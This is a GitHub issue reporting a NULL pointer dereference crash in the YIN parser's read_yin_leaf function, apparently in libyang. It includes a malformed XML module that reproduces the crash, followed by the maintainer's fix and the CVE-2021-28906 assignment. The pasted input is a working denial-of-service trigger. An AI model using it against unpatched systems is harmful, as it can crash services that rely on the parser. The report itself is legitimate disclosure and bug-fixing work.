Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

In function "read_yin_leaf", the value "retval->ext[r]" can be NULL. The operation "retval->ext[r]->flags" result in a crash #1455

Closed
zounathan opened this issue Mar 8, 2021 · 2 comments
Closed

In function "read_yin_leaf", the value "retval->ext[r]" can be NULL. The operation "retval->ext[r]->flags" result in a crash #1455

zounathan opened this issue Mar 8, 2021 · 2 comments
Labels
is:bug Bug description. status:completed From the developer perspective, the issue was solved (bug fixed, question answered,...)

Comments

@zounathan
Copy link 

<?xml  version="1.0" encoding="UTF-8"?>
<module name="empnt"
xmlns="urn:ietf:params:xml:ns:yang:yin:1"
  ec="urn:libyang:tests:emptycont">
  <yang-version value="1"/>
  <namespace uri="urn:libyag:tests:emptycont"/>
  <prefix value="eh"/>
  <revision date="2016-03-18"> <description>
  <text>initial revision</text>
    </description>
  </revision>
  <leaf name="tZpleaf">
    <type name="string"/>
  </leaf>
  <container name="top">
    <leaf name="a">
      <type name=                 "string"/>
    </leaf>
    <container name="b">
      <when condition="../../topleag"/>
      <leaf name="b1">
        <when condition="../.                                                                                            <                                                                                                                                                                                 /                                  *                                                                                                                                                                              
         /                                                               "
xmlns="urn:ietf:params:xml                                                                                                                    4                                                                                                                                     d                                                                                               |                                                                                    ./a"/> <type name="string"/>
      </leaf>
    </container>
    <container name="R">
      <presence value="test"/>
      <leaf name="c1">
        <when condition="../.*/a"/> <type name="string"/>
      </leaf>
    </container>
  </container>
</module>
michalvasko added a commit that referenced this issue Mar 8, 2021
@michalvasko
yin parser BUGFIX invalid memory access
a3917d9 
... in case there were some unresolved
extensions.
Fixes #1454
Fixes #1455
@michalvasko
Copy link
Member

Should be fixed.

@michalvasko michalvasko added is:bug Bug description. status:completed From the developer perspective, the issue was solved (bug fixed, question answered,...) labels Mar 8, 2021
@fredgan
Copy link
Contributor

fredgan commented May 25, 2021

CVE-2021-28906 was assigned to this issue.

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
is:bug Bug description. status:completed From the developer perspective, the issue was solved (bug fixed, question answered,...)
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@fredgan @michalvasko @zounathan